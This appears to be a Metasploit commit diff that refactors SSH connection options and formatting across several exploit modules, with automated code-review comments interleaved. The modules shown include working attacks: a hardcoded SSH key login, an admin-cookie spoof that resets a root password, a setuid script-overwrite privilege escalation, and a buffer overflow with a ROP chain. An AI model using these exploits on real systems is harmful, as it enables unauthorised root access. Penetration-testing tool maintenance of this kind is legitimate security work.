'DefaultTarget' => 0 - })) + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Privileged' => true, + 'Targets' => [ [ 'Universal', {} ] ], + 'Payload' => { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find' + } + }, + 'Author' => ['phroxvs'], + 'License' => MSF_LICENSE, + 'References' => [ + [ 'CVE', '2016-7456' ], + [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2016-0024.html' ], + ], + 'DisclosureDate' => '2016-12-20', + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, + 'DefaultTarget' => 0 + } + ) + ) register_options( [ 
@@ -55,30 +58,24 @@ class MetasploitModule < Msf::Exploit::Remote OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) ] ) - end # helper methods that normally come from Tcp def rhost datastore['RHOST'] end + def rport datastore['RPORT'] end - def do_login() - factory = Rex::Socket::SSHFactory.new(framework,self, datastore['Proxies']) - opt_hash = { - :auth_methods => ['publickey'], - :port => rport, - :key_data => [ key_data ], - :use_agent => false, - :config => false, - :proxy => factory, - :non_interactive => true, - :verify_host_key => :never - } - opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + def do_login + opt_hash = ssh_client_defaults.merge({ + auth_methods: ['publickey'], + port: rport, + key_data: [ key_data ] + }) + opt_hash.merge!(verbose: :debug) if datastore['SSH_DEBUG'] begin ssh_socket = nil ::Timeout.timeout(datastore['SSH_TIMEOUT']) do @@ -103,7 +100,7 @@ class MetasploitModule < Msf::Exploit::Remote # Create a new session from the socket, then dump it. conn = Net::SSH::CommandStream.new(ssh_socket) - self.sockets.delete(ssh_socket.transport.socket) + sockets.delete(ssh_socket.transport.socket) return conn else @@ -112,28 +109,28 @@ class MetasploitModule < Msf::Exploit::Remote end def exploit - conn = do_login() + conn = do_login if conn - print_good "Successful login" - service_data = { + print_good 'Successful login' + service_data = { address: rhost, port: rport, protocol: 'tcp', service_name: 'ssh', - workspace_id: myworkspace_id, + workspace_id: myworkspace_id } credential_data = { username: 'admin', private_type: :ssh_key, private_data: key_data, origin_type: :service, - module_fullname: fullname, + module_fullname: fullname }.merge(service_data) core = create_credential(credential_data) login_data = { core: core, - last_attempted: Time.now, + last_attempted: Time.now }.merge(service_data) create_credential_login(login_data) 
@@ -142,24 +139,22 @@ class MetasploitModule < Msf::Exploit::Remote end def key_data - < { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [] + } ) ) @@ -78,17 +83,11 @@ class MetasploitModule < Msf::Exploit::Remote end def check - factory = ssh_socket_factory - opts = { + opts = ssh_client_defaults.merge({ auth_methods: ['password', 'keyboard-interactive'], - port: rport, - use_agent: false, - config: false, password: password, - proxy: factory, - non_interactive: true, - verify_host_key: :never - } + port: rport + }) begin ssh = nil diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb index 63123aab56..e0bdcaab94 100644 --- a/modules/exploits/multi/ssh/sshexec.rb +++ b/modules/exploits/multi/ssh/sshexec.rb @@ -184,17 +184,12 @@ class MetasploitModule < Msf::Exploit::Remote end def do_login(ip, user, pass, port) - factory = ssh_socket_factory - opt_hash = { - :auth_methods => ['password', 'keyboard-interactive'], - :port => port, - :use_agent => false, - :config => false, - :password => pass, - :proxy => factory, - :non_interactive => true, - :verify_host_key => :never - } + + opt_hash = ssh_client_defaults.merge({ + auth_methods: ['password', 'keyboard-interactive'], + port: port, + password: pass + }) opt_hash[:verbose] = :debug if datastore['SSH_DEBUG'] diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index 09ac576e6f..a26bf80f64 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb 
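Review bot: The rewritten `do_login` in sshexec.rb starts with an added empty line directly after `def do_login(ip, user, pass, port)`, which none of the sibling `do_login` rewrites in this commit have and which RuboCop's Layout/EmptyLinesAroundMethodBody would flag. Drop that blank `+` line so the body begins with `opt_hash = ssh_client_defaults.merge({`. The method continues past the end of the hunk.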
@@ -11,38 +11,39 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Auxiliary::Report include Msf::Exploit::Remote::SSH - def initialize(info={}) - super(update_info(info, - 'Name' => "Schneider Electric Pelco Endura NET55XX Encoder", - 'Description' => %q( - This module exploits inadequate access controls within the webUI to enable - the SSH service and change the root password. This module has been tested successfully - on: NET5501, NET5501-I, NET5501-XT, NET5504, NET5500, NET5516, NET550 versions. - ), - 'License' => MSF_LICENSE, - 'Author' => - [ + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Schneider Electric Pelco Endura NET55XX Encoder', + 'Description' => %q{ + This module exploits inadequate access controls within the webUI to enable + the SSH service and change the root password. This module has been tested successfully + on: NET5501, NET5501-I, NET5501-XT, NET5504, NET5500, NET5516, NET550 versions. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'Lucas Dinucci ', 'Vitor Esperança ' ], - 'References' => - [ + 'References' => [ ['CVE', '2019-6814'], ['URL', 'https://www.schneider-electric.com/en/download/document/SEVD-2019-134-01/'] ], - 'Payload' => - { + 'Payload' => { 'Compat' => { - 'PayloadType' => 'cmd_interact', + 'PayloadType' => 'cmd_interact', 'ConnectionType' => 'find' } }, - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Targets' => [ [ "Universal", {} ] ], - 'Privileged' => true, - 'DisclosureDate' => '2019-01-25', - 'DefaultTarget' => 0)) + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => [ [ 'Universal', {} ] ], + 'Privileged' => true, + 'DisclosureDate' => '2019-01-25', + 'DefaultTarget' => 0 + ) + ) register_options( [ 
@@ -82,34 +83,35 @@ class MetasploitModule < Msf::Exploit::Remote ''\ '' - connect_udp(true, {'RPORT' => datastore['UDP_PORT']}) + connect_udp(true, { 'RPORT' => datastore['UDP_PORT'] }) udp_sock.put(xmlPayload) resp = [] resp << udp_sock.get(datastore['TIMEOUT']) xmlResponse = resp.join(',') disconnect_udp - if xmlResponse.include?("NET5501") || xmlResponse.include?("NET5501-I") || xmlResponse.include?("NET5501-XT") || xmlResponse.include?("NET5504") || xmlResponse.include?("NET5500") || xmlResponse.include?("NET5516") || xmlResponse.include?("NET5508") + if xmlResponse.include?('NET5501') || xmlResponse.include?('NET5501-I') || xmlResponse.include?('NET5501-XT') || xmlResponse.include?('NET5504') || xmlResponse.include?('NET5500') || xmlResponse.include?('NET5516') || xmlResponse.include?('NET5508') return Exploit::CheckCode::Appears end - CheckCode::Safe + + CheckCode::Safe end def change_password print_status("#{peer} - Attempt to change the root password...") - post = {enable: true, passwd: new_password, userid: "root"}.to_json + post = { enable: true, passwd: new_password, userid: 'root' }.to_json login = send_request_cgi({ 'method' => 'POST', - 'uri' => normalize_uri(target_uri.path, '/cgi-bin/webra.fcgi?network/ssh'), + 'uri' => normalize_uri(target_uri.path, '/cgi-bin/webra.fcgi?network/ssh'), 'data' => post, 'headers' => { - 'Cookie' => 'live_onoff=0; userid=admin; grpid=ADMIN; permission=2147483647', - 'Content-Type' => 'application/json;charset=utf-8' + 'Cookie' => 'live_onoff=0; userid=admin; grpid=ADMIN; permission=2147483647', + 'Content-Type' => 'application/json;charset=utf-8' } - }, timeout=datastore['TIMEOUT']) + }, timeout = datastore['TIMEOUT']) - fail_with(Failure::UnexpectedReply, "Failed to change root password") unless login && login.code == 200 + fail_with(Failure::UnexpectedReply, 'Failed to change root password') unless login && login.code == 200 print_good("#{rhost}:80 - Successfully changed the root password...") 
print_good("#{rhost}:80 - New credentials: User: root / Password: #{new_password}") end @@ -117,18 +119,12 @@ class MetasploitModule < Msf::Exploit::Remote def do_login change_password print_status("#{rhost}:22 - Attempt to start a SSH connection...") - factory = ssh_socket_factory - opts = { - :auth_methods => ['password', 'keyboard-interactive'], - :port => 22, - :use_agent => false, - :config => true, - :password => new_password, - :proxy => factory, - :non_interactive => true, - :verify_host_key => :never - } - opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + opts = ssh_client_defaults.merge({ + auth_methods: ['password', 'keyboard-interactive'], + port: 22, + password: new_password + }) + opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] begin ssh = nil ::Timeout.timeout(datastore['SSH_TIMEOUT']) do diff --git a/modules/exploits/unix/ssh/arista_tacplus_shell.rb b/modules/exploits/unix/ssh/arista_tacplus_shell.rb index 2713ac58ae..286c0b182f 100644 --- a/modules/exploits/unix/ssh/arista_tacplus_shell.rb +++ b/modules/exploits/unix/ssh/arista_tacplus_shell.rb @@ -44,7 +44,12 @@ class MetasploitModule < Msf::Exploit::Remote 'Platform' => 'linux', 'PayloadType' => 'cmd_interact', 'Privileged' => true, - 'Targets' => [ [ 'Universal', {} ] ] + 'Targets' => [ [ 'Universal', {} ] ], + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [] + } ) ) @@ -67,17 +72,11 @@ class MetasploitModule < Msf::Exploit::Remote end def check - factory = ssh_socket_factory - opts = { + opts = ssh_client_defaults.merge({ auth_methods: ['password', 'keyboard-interactive'], port: rport, - use_agent: false, - config: false, - password: password, - proxy: factory, - non_interactive: true, - verify_host_key: :never - } + password: password + }) begin ::Timeout.timeout(datastore['SSH_TIMEOUT']) do 
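Review bot: `}, timeout = datastore['TIMEOUT'])` in `change_password` still passes an assignment expression as the second positional argument of `send_request_cgi`; the reformat only added spaces around `=`, leaving a `timeout` local that is assigned and never read and that reads like a keyword argument. Pass the value directly, `}, datastore['TIMEOUT'])`. The `check` method whose tail opens this hunk starts before it.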
diff --git a/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb b/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb
index 18aff01a26..078f2a6153 100644
--- a/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb
+++ b/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb
@@ -12,50 +12,49 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::EXE include Msf::Exploit::Remote::SSH - def initialize(info={}) - super(update_info(info, - 'Name' => "Array Networks vAPV and vxAG Private Key Privilege Escalation Code Execution", - 'Description' => %q{ - This module exploits a default hardcoded private SSH key or default hardcoded - login and password in the vAPV 8.3.2.17 and vxAG 9.2.0.34 appliances made - by Array Networks. After logged in as the unprivileged user, it's possible to modify - the world-writable file /ca/bin/monitor.sh with attacker-supplied arbitrary code. - Execution is possible by using the backend tool, running setuid, to turn the debug - monitoring on. This makes it possible to trigger a payload with root privileges. - }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'xistence ', # Original discovery and Metasploit module + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Array Networks vAPV and vxAG Private Key Privilege Escalation Code Execution', + 'Description' => %q{ + This module exploits a default hardcoded private SSH key or default hardcoded + login and password in the vAPV 8.3.2.17 and vxAG 9.2.0.34 appliances made + by Array Networks. After logged in as the unprivileged user, it's possible to modify + the world-writable file /ca/bin/monitor.sh with attacker-supplied arbitrary code. + Execution is possible by using the backend tool, running setuid, to turn the debug + monitoring on. This makes it possible to trigger a payload with root privileges. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'xistence ', # Original discovery and Metasploit module ], - 'References' => - [ + 'References' => [ ['OSVDB', '104652'], ['OSVDB', '104653'], ['OSVDB', '104654'], ['PACKETSTORM', '125761'] ], - 'DefaultOptions' => - { + 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Payload' => - { + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Payload' => { 'Compat' => - { - 'PayloadType' => 'cmd', - 'RequiredCmd' => 'generic telnet', - } + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic telnet' + } }, - 'Targets' => - [ + 'Targets' => [ ['vAPV 8.3.2.17 / vxAG 9.2.0.34', {}], ], - 'Privileged' => true, - 'DisclosureDate' => '2014-02-03', - 'DefaultTarget' => 0)) + 'Privileged' => true, + 'DisclosureDate' => '2014-02-03', + 'DefaultTarget' => 0 + ) + ) register_options( [ @@ -99,17 +98,11 @@ class MetasploitModule < Msf::Exploit::Remote key_data += "+sqSEhA35Le2kC4Y1/A=\n" key_data += "-----END DSA PRIVATE KEY-----\n" - factory = ssh_socket_factory - opts = { - :auth_methods => ['publickey'], - :port => rport, - :use_agent => false, - :config => true, - :key_data => key_data, - :proxy => factory, - :non_interactive => true, - :verify_host_key => :never - } + opts = ssh_client_defaults.merge({ + auth_methods: ['publickey'], + port: rport, + key_data: key_data + }) opts end @@ -118,14 +111,14 @@ class MetasploitModule < Msf::Exploit::Remote print_status("#{rhost}:#{rport} - Attempting to login with '#{user}:#{pass}'") factory = ssh_socket_factory opts = { - :auth_methods => ['password', 'keyboard-interactive'], - :port => rport, - :use_agent => false, - :config => true, - :password => pass, - :proxy => factory, - :non_interactive => true, - :verify_host_key => :never + auth_methods: ['password', 'keyboard-interactive'], + port: rport, + use_agent: false, + config: true, + password: pass, + proxy: factory, + non_interactive: true, + verify_host_key: :never } opts 
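Review bot: In the `@@ -118,14 +111,14` hunk, `login_user_pass` still builds its own hash (`factory = ssh_socket_factory`, `use_agent: false`, `config: true`, `proxy: factory`, `non_interactive: true`, `verify_host_key: :never`) while the sibling `login_key` in the hunk just above now uses `ssh_client_defaults.merge({...})`; the hunk only converts hash-rocket syntax to `key:` style. The two auth paths of the same module therefore negotiate differently: the password path keeps reading ~/.ssh/config and does not inherit `append_all_supported_algorithms`, so a target that only speaks legacy kex/ciphers would succeed with the key and fail with the password. Suggest `opts = ssh_client_defaults.merge({ auth_methods: ['password', 'keyboard-interactive'], port: rport, password: pass })` and dropping the `factory` local. The `def login_user_pass` line and the method's closing `end` are outside the hunk.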
@@ -133,7 +126,7 @@ class MetasploitModule < Msf::Exploit::Remote def build_command mon_temp = rand_text_alphanumeric(10) - cmd = Rex::Text.encode_base64("nohup " + payload.encoded) + cmd = Rex::Text.encode_base64('nohup ' + payload.encoded) # Turn debug monitoring off, just in case it's turned on command = '/ca/bin/backend -c "debug monitor off"`echo -e "\0374"`;' # Copy the data from monitor.sh to a random tmp file @@ -148,8 +141,7 @@ class MetasploitModule < Msf::Exploit::Remote command end - - #def execute_command(cmd, opts) + # def execute_command(cmd, opts) def exploit user = datastore['USER'] pass = datastore['PASS'] @@ -160,7 +152,7 @@ class MetasploitModule < Msf::Exploit::Remote opts = login_user_pass(user, pass) end - opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] begin ssh = nil diff --git a/modules/exploits/windows/ssh/sysax_ssh_username.rb b/modules/exploits/windows/ssh/sysax_ssh_username.rb index 63f02bef64..8d9a1e1a9e 100644 --- a/modules/exploits/windows/ssh/sysax_ssh_username.rb +++ b/modules/exploits/windows/ssh/sysax_ssh_username.rb 
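Review bot: In the `@@ -148,8 +141,7` hunk the commented-out signature `# def execute_command(cmd, opts)` above `def exploit` is dead code that the change only re-spaces; it documents nothing about `exploit` and should be removed rather than kept in RuboCop-friendly form. If it is meant as a reminder of a planned refactor, a `# TODO:` line stating the intent would be clearer. The `build_command` and `exploit` bodies extend beyond their hunks.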
@@ -13,57 +13,52 @@ class MetasploitModule < Msf::Exploit::Remote super( update_info( info, - 'Name' => "Sysax 5.53 SSH Username Buffer Overflow", - 'Description' => %q{ - This module exploits a vulnerability found in Sysax's SSH service. By + 'Name' => 'Sysax 5.53 SSH Username Buffer Overflow', + 'Description' => %q{ + This module exploits a vulnerability found in Sysax's SSH service. By supplying a long username, the SSH server will copy that data on the stack without proper bounds checking, therefore allowing remote code execution under the context of the user. Please note that previous versions (before 5.53) are also affected by this bug. }, - 'License' => MSF_LICENSE, - 'Author' => + 'License' => MSF_LICENSE, + 'Author' => [ + 'Craig Freyman', # Initial discovery, PoC + 'sinn3r' # Metasploit + ], + 'References' => [ + ['OSVDB', '79689'], + ['URL', 'http://www.pwnag3.com/2012/02/sysax-multi-server-ssh-username-exploit.html'], + ['EDB', '18535'] + ], + 'Payload' => { + 'Space' => 1024, + 'BadChars' => "\x00\x3a", + 'StackAdjustment' => -3500 + }, + 'DefaultOptions' => { + 'EXITFUNC' => 'seh' + }, + 'Platform' => 'win', + 'Targets' => [ [ - 'Craig Freyman', # Initial discovery, PoC - 'sinn3r' # Metasploit + 'Sysax 5.53 on Win XP SP3 / Win2k3 SP0', + { + 'Rop' => false, + 'Ret' => 0x00402669 # POP/POP/RET - sysaxservd.exe + } ], - 'References' => [ - ['OSVDB', '79689'], - ['URL', 'http://www.pwnag3.com/2012/02/sysax-multi-server-ssh-username-exploit.html'], - ['EDB', '18535'] - ], - 'Payload' => - { - 'Space' => 1024, - 'BadChars' => "\x00\x3a", - 'StackAdjustment' => -3500 - }, - 'DefaultOptions' => - { - 'EXITFUNC' => "seh" - }, - 'Platform' => 'win', - 'Targets' => - [ - [ - 'Sysax 5.53 on Win XP SP3 / Win2k3 SP0', - { - 'Rop' => false, - 'Ret' => 0x00402669 # POP/POP/RET - sysaxservd.exe - } - ], - [ - 'Sysax 5.53 on Win2K3 SP1/SP2', - { - 'Rop' => true, - 'Ret' => 0x0046d23c # ADD ESP, 0F8C # RETN - } - ] - ], - 'Privileged' => false, + 'Sysax 5.53 on Win2K3 
SP1/SP2', + { + 'Rop' => true, + 'Ret' => 0x0046d23c # ADD ESP, 0F8C # RETN + } + ] + ], + 'Privileged' => false, 'DisclosureDate' => '2012-02-27', - 'DefaultTarget' => 0 + 'DefaultTarget' => 0 ) ) @@ -78,11 +73,11 @@ class MetasploitModule < Msf::Exploit::Remote banner = sock.get_once(-1, 5) || '' disconnect vprint_status("Banner: #{banner}") - if banner.match?(/SSH\-2\.0\-SysaxSSH_1\.0/) + if banner.match?(/SSH-2\.0-SysaxSSH_1\.0/) return Exploit::CheckCode::Appears end - rescue - vprint_error("An error has occurred while trying to read a response from target") + rescue StandardError + vprint_error('An error has occurred while trying to read a response from target') return Exploit::CheckCode::Unknown end @@ -93,7 +88,7 @@ class MetasploitModule < Msf::Exploit::Remote # # Align the stack to the beginning of the fixed size payload # - align = "\x54" # PUSH ESP + align = "\x54" # PUSH ESP align << "\x58" # POP EAX align << "\x04\x08" # ADD AL,0x08 align << "\x8b\x18" # MOV EBX, [EAX] @@ -128,8 +123,8 @@ class MetasploitModule < Msf::Exploit::Remote end def generate_rop_exploit - junk = rand_text(4).unpack("L")[0].to_i - nop = make_nops(4).unpack("L")[0].to_i + junk = rand_text(4).unpack('L')[0].to_i + nop = make_nops(4).unpack('L')[0].to_i # !mona rop -m msvcrt p = @@ -158,7 +153,7 @@ class MetasploitModule < Msf::Exploit::Remote 0x77bb2563, # POP EAX # RETN nop, 0x77be6591, # PUSHAD # ADD AL,0EF # RETN - ].pack("V*") + ].pack('V*') p << payload.encoded @@ -211,7 +206,7 @@ class MetasploitModule < Msf::Exploit::Remote print_error("Cannot establish a connection on #{rhost}:#{rport}") return rescue StandardError => e - if e.message.match?(/fingerprint [0-9a-z\:]+ does not match/) + if e.message.match?(/fingerprint [0-9a-z:]+ does not match/) print_error("Please remove #{rhost}:#{rport} from your known_hosts list") return end 
diff --git a/spec/lib/metasploit/framework/login_scanner/ssh_spec.rb b/spec/lib/metasploit/framework/login_scanner/ssh_spec.rb
index 7f4d8b94c9..d4ebb5aa2c 100644
--- a/spec/lib/metasploit/framework/login_scanner/ssh_spec.rb
+++ b/spec/lib/metasploit/framework/login_scanner/ssh_spec.rb
@@ -143,6 +143,7 @@ RSpec.describe Metasploit::Framework::LoginScanner::SSH do
 :config => false,
 :verbose => ssh_scanner.verbosity,
 :proxy => factory,
+ :append_all_supported_algorithms => true,
 :auth_methods => ['password','keyboard-interactive'],
 :password => private,
 :non_interactive => true,